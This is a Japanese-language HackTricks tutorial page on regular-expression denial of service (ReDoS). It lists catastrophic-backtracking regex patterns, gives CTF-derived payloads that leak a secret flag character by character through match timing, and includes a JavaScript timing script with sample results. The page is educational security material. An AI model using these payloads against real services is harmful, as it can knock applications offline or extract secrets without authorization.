mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 20:53:37 +00:00
105 lines
7 KiB
Markdown
105 lines
7 KiB
Markdown
# 正規表現サービス拒否攻撃 - ReDoS
|
||
|
||
{% hint style="success" %}
|
||
AWSハッキングを学び、実践する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
GCPハッキングを学び、実践する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>HackTricksをサポートする</summary>
|
||
|
||
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
|
||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**Telegramグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||
|
||
</details>
|
||
{% endhint %}
|
||
|
||
# 正規表現サービス拒否攻撃 (ReDoS)
|
||
|
||
**正規表現サービス拒否攻撃 (ReDoS)** は、誰かが正規表現(テキスト内のパターンを検索し一致させる方法)の動作の弱点を利用することで発生します。正規表現が使用されると、特に処理するテキストが大きくなると、非常に遅くなることがあります。この遅さは、テキストサイズがわずかに増加するだけで急速に悪化することがあります。攻撃者はこの問題を利用して、正規表現を使用するプログラムが長時間正常に動作しないようにすることができます。
|
||
|
||
## 問題のあるRegexナイーブアルゴリズム
|
||
|
||
**詳細は[https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)を確認してください。**
|
||
|
||
## 悪意のあるRegex <a href="#evil-regexes" id="evil-regexes"></a>
|
||
|
||
悪意のある正規表現パターンとは、**作成された入力に引っかかり、DoSを引き起こす**ことができるものです。悪意のある正規表現パターンは、通常、繰り返しを伴うグループ化や、繰り返しまたは重複を含む選択肢を含んでいます。悪意のあるパターンのいくつかの例は次のとおりです:
|
||
|
||
* (a+)+
|
||
* ([a-zA-Z]+)*
|
||
* (a|aa)+
|
||
* (a|a?)+
|
||
* (.*a){x} for x > 10
|
||
|
||
これらはすべて、入力 `aaaaaaaaaaaaaaaaaaaaaaaa!` に対して脆弱です。
|
||
|
||
## ReDoSペイロード
|
||
|
||
### ReDoSによる文字列の流出
|
||
|
||
CTF(またはバグバウンティ)では、**正規表現が一致する機密情報(フラグ)を制御している**かもしれません。その場合、**正規表現が一致した場合にページをフリーズ(タイムアウトまたは長い処理時間)させる**ことが有用です。そうすることで、**文字列を1文字ずつ流出させる**ことができます:
|
||
|
||
* [**この投稿**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)では、このReDoSルールを見つけることができます:`^(?=<flag>)((.*)*)*salt$`
|
||
* 例:`^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
|
||
* [**この解説**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)では、次のものが見つかります:`<flag>(((((((.*)*)*)*)*)*)*)!`
|
||
* [**この解説**](https://ctftime.org/writeup/25869)では、次のものが使用されました:`^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`
|
||
|
||
### ReDoSの入力と正規表現の制御
|
||
|
||
以下は、**入力**と**正規表現**の両方を**制御**する**ReDoS**の例です:
|
||
```javascript
|
||
function check_time_regexp(regexp, text){
|
||
var t0 = new Date().getTime();;
|
||
new RegExp(regexp).test(text);
|
||
var t1 = new Date().getTime();;
|
||
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
|
||
}
|
||
|
||
// This payloads work because the input has several "a"s
|
||
[
|
||
// "((a+)+)+$", //Eternal,
|
||
// "(a?){100}$", //Eternal
|
||
"(a|a?)+$",
|
||
"(\\w*)+$", //Generic
|
||
"(a*)+$",
|
||
"(.*a){100}$",
|
||
"([a-zA-Z]+)*$", //Generic
|
||
"(a+)*$",
|
||
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))
|
||
|
||
/*
|
||
Regexp (a|a?)+$ took 5076 milliseconds.
|
||
Regexp (\w*)+$ took 3198 milliseconds.
|
||
Regexp (a*)+$ took 3281 milliseconds.
|
||
Regexp (.*a){100}$ took 1436 milliseconds.
|
||
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
|
||
Regexp (a+)*$ took 723 milliseconds.
|
||
*/
|
||
```
|
||
## ツール
|
||
|
||
* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
|
||
* [https://devina.io/redos-checker](https://devina.io/redos-checker)
|
||
|
||
## 参考文献
|
||
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
|
||
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
|
||
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)
|
||
|
||
{% hint style="success" %}
|
||
AWSハッキングを学び、練習する:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
GCPハッキングを学び、練習する:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
||
<details>
|
||
|
||
<summary>HackTricksをサポートする</summary>
|
||
|
||
* [**サブスクリプションプラン**](https://github.com/sponsors/carlospolop)を確認してください!
|
||
* **💬 [**Discordグループ**](https://discord.gg/hRep4RUj7f)または[**テレグラムグループ**](https://t.me/peass)に参加するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**をフォローしてください。**
|
||
* **ハッキングのトリックを共有するには、[**HackTricks**](https://github.com/carlospolop/hacktricks)および[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud)のGitHubリポジトリにPRを提出してください。**
|
||
|
||
</details>
|
||
{% endhint %}
|